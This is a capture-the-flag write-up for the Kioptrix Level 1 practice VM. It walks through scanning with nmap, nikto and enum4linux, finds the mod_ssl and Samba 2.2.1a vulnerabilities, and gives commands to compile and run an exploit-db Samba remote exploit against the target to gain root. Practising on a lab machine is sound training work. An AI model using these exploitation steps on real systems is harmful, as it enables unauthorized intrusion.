Kioptrix: Level 1

This is my writeup for the Kioptrix Level 1 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering

Let's do a nmap_fast scan.

nmap_fast

We now have a list of ports. When we access the IP of the VM on port 80, we see a test page for the Apache Web Server.

apache_test_page

Let's see what nikto finds on this webserver.

nikto

mod_ssl

One interesting part is a vulnerability in mod_ssl which may allow a remote shell:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Asking google for "OSVDB-756" returns a lot of results regarding OpenFuck which targets mod_ssl. Even a step-by-step guide to update the old exploit to work with the newer library files for OpenSSL. We need to change the link to the exploit as well.

Samba

From the nmap scan we can see, samba runs on port 139.
Let's have a closer look:
When running enum4linux we get to know that Samba 2.2.1a is installed.

[+] Got OS info for 192.168.254.162 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.254.162 from srvinfo:
	KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
	platform_id     :	500
	os version      :	4.5
	server type     :	0x9a03

We use searchsploit to find exploits for this version.

$ searchsploit samba 2.2
exploitlist_samba

Exploitation

mod_ssl

After updating the exploit, we run it against our victim.

exploit_mod_ssl

The flag is located in one of the mails for root:

$ mail 

Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Samba

Let's use the RCE exploit. First we copy the exploit to our working directory:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

Next we need to compile it and make it executable:

$ gcc -o samba_exploit exploit.c
$ chmod +x samba_exploit

Then we run the exploit against our victim (-b is platform selection):

$ ./samba_exploit -b 0 __IP__

exploit_samba-1

Kioptrix: Level 1 is good to step into scanning and running prewritten exploits.